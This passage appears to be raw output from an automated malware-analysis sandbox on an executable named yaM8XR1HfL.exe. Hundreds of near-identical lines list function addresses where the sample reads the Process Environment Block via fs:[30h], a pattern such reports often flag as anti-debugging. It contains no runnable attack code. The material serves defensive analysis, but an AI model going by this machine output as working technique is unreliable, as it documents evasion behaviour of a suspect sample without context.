          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h]4_2_0148A3C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h]4_2_014883C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h]4_2_014883C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h]4_2_014883C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h]4_2_014883C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E3DB mov eax, dword ptr fs:[00000030h]4_2_0152E3DB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E3DB mov eax, dword ptr fs:[00000030h]4_2_0152E3DB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E3DB mov ecx, dword ptr fs:[00000030h]4_2_0152E3DB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152E3DB mov eax, dword ptr fs:[00000030h]4_2_0152E3DB
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015063C0 mov eax, dword ptr fs:[00000030h]4_2_015063C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153C3CD mov eax, dword ptr fs:[00000030h]4_2_0153C3CD
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h]4_2_014903E9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B63FF mov eax, dword ptr fs:[00000030h]4_2_014B63FF
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E3F0 mov eax, dword ptr fs:[00000030h]4_2_0149E3F0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E3F0 mov eax, dword ptr fs:[00000030h]4_2_0149E3F0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0149E3F0 mov eax, dword ptr fs:[00000030h]4_2_0149E3F0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A438F mov eax, dword ptr fs:[00000030h]4_2_014A438F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A438F mov eax, dword ptr fs:[00000030h]4_2_014A438F
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147E388 mov eax, dword ptr fs:[00000030h]4_2_0147E388
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147E388 mov eax, dword ptr fs:[00000030h]4_2_0147E388
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147E388 mov eax, dword ptr fs:[00000030h]4_2_0147E388
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01478397 mov eax, dword ptr fs:[00000030h]4_2_01478397
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01478397 mov eax, dword ptr fs:[00000030h]4_2_01478397
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01478397 mov eax, dword ptr fs:[00000030h]4_2_01478397
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153A250 mov eax, dword ptr fs:[00000030h]4_2_0153A250
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153A250 mov eax, dword ptr fs:[00000030h]4_2_0153A250
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0155625D mov eax, dword ptr fs:[00000030h]4_2_0155625D
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01486259 mov eax, dword ptr fs:[00000030h]4_2_01486259
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01508243 mov eax, dword ptr fs:[00000030h]4_2_01508243
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01508243 mov ecx, dword ptr fs:[00000030h]4_2_01508243
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147A250 mov eax, dword ptr fs:[00000030h]4_2_0147A250
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01530274 mov eax, dword ptr fs:[00000030h]4_2_01530274
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01484260 mov eax, dword ptr fs:[00000030h]4_2_01484260
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01484260 mov eax, dword ptr fs:[00000030h]4_2_01484260
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01484260 mov eax, dword ptr fs:[00000030h]4_2_01484260
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147826B mov eax, dword ptr fs:[00000030h]4_2_0147826B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0147823B mov eax, dword ptr fs:[00000030h]4_2_0147823B
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015562D6 mov eax, dword ptr fs:[00000030h]4_2_015562D6
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h]4_2_0148A2C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h]4_2_0148A2C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h]4_2_0148A2C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h]4_2_0148A2C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h]4_2_0148A2C3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014902E1 mov eax, dword ptr fs:[00000030h]4_2_014902E1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014902E1 mov eax, dword ptr fs:[00000030h]4_2_014902E1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014902E1 mov eax, dword ptr fs:[00000030h]4_2_014902E1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE284 mov eax, dword ptr fs:[00000030h]4_2_014BE284
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE284 mov eax, dword ptr fs:[00000030h]4_2_014BE284
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01500283 mov eax, dword ptr fs:[00000030h]4_2_01500283
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01500283 mov eax, dword ptr fs:[00000030h]4_2_01500283
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01500283 mov eax, dword ptr fs:[00000030h]4_2_01500283
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014902A0 mov eax, dword ptr fs:[00000030h]4_2_014902A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014902A0 mov eax, dword ptr fs:[00000030h]4_2_014902A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h]4_2_015162A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015162A0 mov ecx, dword ptr fs:[00000030h]4_2_015162A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h]4_2_015162A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h]4_2_015162A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h]4_2_015162A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015162A0 mov eax, dword ptr fs:[00000030h]4_2_015162A0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01488550 mov eax, dword ptr fs:[00000030h]4_2_01488550
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01488550 mov eax, dword ptr fs:[00000030h]4_2_01488550
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B656A mov eax, dword ptr fs:[00000030h]4_2_014B656A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B656A mov eax, dword ptr fs:[00000030h]4_2_014B656A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B656A mov eax, dword ptr fs:[00000030h]4_2_014B656A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01516500 mov eax, dword ptr fs:[00000030h]4_2_01516500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01554500 mov eax, dword ptr fs:[00000030h]4_2_01554500
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h]4_2_014AE53E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h]4_2_014AE53E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h]4_2_014AE53E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h]4_2_014AE53E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h]4_2_014AE53E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490535 mov eax, dword ptr fs:[00000030h]4_2_01490535
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490535 mov eax, dword ptr fs:[00000030h]4_2_01490535
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490535 mov eax, dword ptr fs:[00000030h]4_2_01490535
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490535 mov eax, dword ptr fs:[00000030h]4_2_01490535
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490535 mov eax, dword ptr fs:[00000030h]4_2_01490535
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01490535 mov eax, dword ptr fs:[00000030h]4_2_01490535
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE5CF mov eax, dword ptr fs:[00000030h]4_2_014BE5CF
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE5CF mov eax, dword ptr fs:[00000030h]4_2_014BE5CF
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014865D0 mov eax, dword ptr fs:[00000030h]4_2_014865D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA5D0 mov eax, dword ptr fs:[00000030h]4_2_014BA5D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BA5D0 mov eax, dword ptr fs:[00000030h]4_2_014BA5D0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BC5ED mov eax, dword ptr fs:[00000030h]4_2_014BC5ED
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BC5ED mov eax, dword ptr fs:[00000030h]4_2_014BC5ED
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014825E0 mov eax, dword ptr fs:[00000030h]4_2_014825E0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h]4_2_014AE5E7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014B4588 mov eax, dword ptr fs:[00000030h]4_2_014B4588
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01482582 mov eax, dword ptr fs:[00000030h]4_2_01482582
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01482582 mov ecx, dword ptr fs:[00000030h]4_2_01482582
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE59C mov eax, dword ptr fs:[00000030h]4_2_014BE59C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015005A7 mov eax, dword ptr fs:[00000030h]4_2_015005A7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015005A7 mov eax, dword ptr fs:[00000030h]4_2_015005A7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015005A7 mov eax, dword ptr fs:[00000030h]4_2_015005A7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A45B1 mov eax, dword ptr fs:[00000030h]4_2_014A45B1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014A45B1 mov eax, dword ptr fs:[00000030h]4_2_014A45B1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153A456 mov eax, dword ptr fs:[00000030h]4_2_0153A456
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]4_2_014BE443
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A245A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147645D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C460 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AA470 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B8402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147C427 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147E420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA430 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014804E5 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153A49A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150A4B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014864AB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B44B0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01504755 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B674D mov esi, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B674D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E75D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2750 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC700 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B0710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC720 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B273C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B273C mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FC730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148C7C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015007C3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A27ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E7E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014847FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152678E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014807AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015347A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149C640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154866E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B2674 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE609 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2619 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148262C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B6620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B8620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E627 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA6C7 mov ebx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA6C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015006F1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE6F2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484690 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC6A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B66B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554940 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01500946 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E mov edx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A6962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01524978 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C97C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C912 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE908 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478918 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150892A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0151892B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154A9D3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015169C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B49D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E9E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B29F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015089B3 mov esi, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015089B3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014809AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01492840 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484859 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B0854 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516870 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E872 mov eax, dword ptr fs:[00000030h]
